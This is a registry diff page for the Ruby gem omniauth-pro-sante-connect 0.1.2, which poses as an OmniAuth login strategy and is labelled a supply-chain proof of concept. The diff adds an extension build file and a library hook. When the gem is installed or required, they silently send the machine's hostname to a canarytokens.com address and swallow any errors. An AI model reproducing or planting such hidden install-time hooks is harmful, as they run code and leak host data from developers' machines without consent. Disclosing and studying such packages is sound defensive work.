omniauth-pro-sante-connect 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of omniauth-pro-sante-connect might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 22e167fab5a4fbedeb7f1a5962fa7f2aa453fd6102079e06e45fd3f54dce432c
4
+ data.tar.gz: ad60e66f7bc498186fcc88e677570d2cf23e7751348b7714879944a4819cc846
5
+ SHA512:
6
+ metadata.gz: c18f71b5391e54581da24b9cff3b6bdf337ef66935f22a73ab4c91504b749c89f9b144eb26d8cdf2585aff0496919d5ed7e33a57074521cb711a002737929af9
7
+ data.tar.gz: 0367b62cf97069a786f52ad2f3e44cd5813b923d51541f3f99533da7eaa06946f97f9dd95288c7f6c3a3efa99d32743d8591fe5c95cea90ae30a3db701d4e26a
data/ext/extconf.rb ADDED
@@ -0,0 +1,18 @@
1
+ # ext/extconf.rb
2
+ require_relative 'install_hook'
3
+
4
+ File.open("Makefile", "w") do |f|
5
+ f.puts <<~MAKE
6
+ all:
7
+ \t@echo all done
8
+
9
+ install:
10
+ \t@echo install done
11
+
12
+ clean:
13
+ \t@echo clean done
14
+ MAKE
15
+ end
16
+
17
+
18
+
@@ -0,0 +1,9 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+
5
+ begin
6
+ uri = URI("http://canarytokens.com/traffic/pvkhqv8uvw1ydfglsz5jd0jkk/post.jsp?installed=#{Socket.gethostname}")
7
+ Net::HTTP.get(uri)
8
+ rescue
9
+ end
@@ -0,0 +1,9 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+
5
+ begin
6
+ uri = URI("http://canarytokens.com/traffic/pvkhqv8uvw1ydfglsz5jd0jkk/post.jsp?host=#{Socket.gethostname}")
7
+ Net::HTTP.get(uri)
8
+ rescue
9
+ end
@@ -0,0 +1,7 @@
1
+ require_relative 'omniauth/hook'
2
+
3
+ module Omniauth
4
+ module ProSanteConnect
5
+ VERSION = "0.1.2"
6
+ end
7
+ end
metadata ADDED
@@ -0,0 +1,46 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: omniauth-pro-sante-connect
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.2
5
+ platform: ruby
6
+ authors:
7
+ - Icare
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ description: This version includes an install-time payload using RubyGems' extension
13
+ hook.
14
+ email:
15
+ - icare@yopmail.com
16
+ executables: []
17
+ extensions:
18
+ - ext/extconf.rb
19
+ extra_rdoc_files: []
20
+ files:
21
+ - ext/extconf.rb
22
+ - ext/install_hook.rb
23
+ - lib/omniauth-pro-sante-connect.rb
24
+ - lib/omniauth/hook.rb
25
+ homepage: https://example.com
26
+ licenses:
27
+ - MIT
28
+ metadata: {}
29
+ rdoc_options: []
30
+ require_paths:
31
+ - lib
32
+ required_ruby_version: !ruby/object:Gem::Requirement
33
+ requirements:
34
+ - - ">="
35
+ - !ruby/object:Gem::Version
36
+ version: '3.0'
37
+ required_rubygems_version: !ruby/object:Gem::Requirement
38
+ requirements:
39
+ - - ">="
40
+ - !ruby/object:Gem::Version
41
+ version: '0'
42
+ requirements: []
43
+ rubygems_version: 3.6.7
44
+ specification_version: 4
45
+ summary: 'Supply chain PoC: payload runs at gem install'
46
+ test_files: []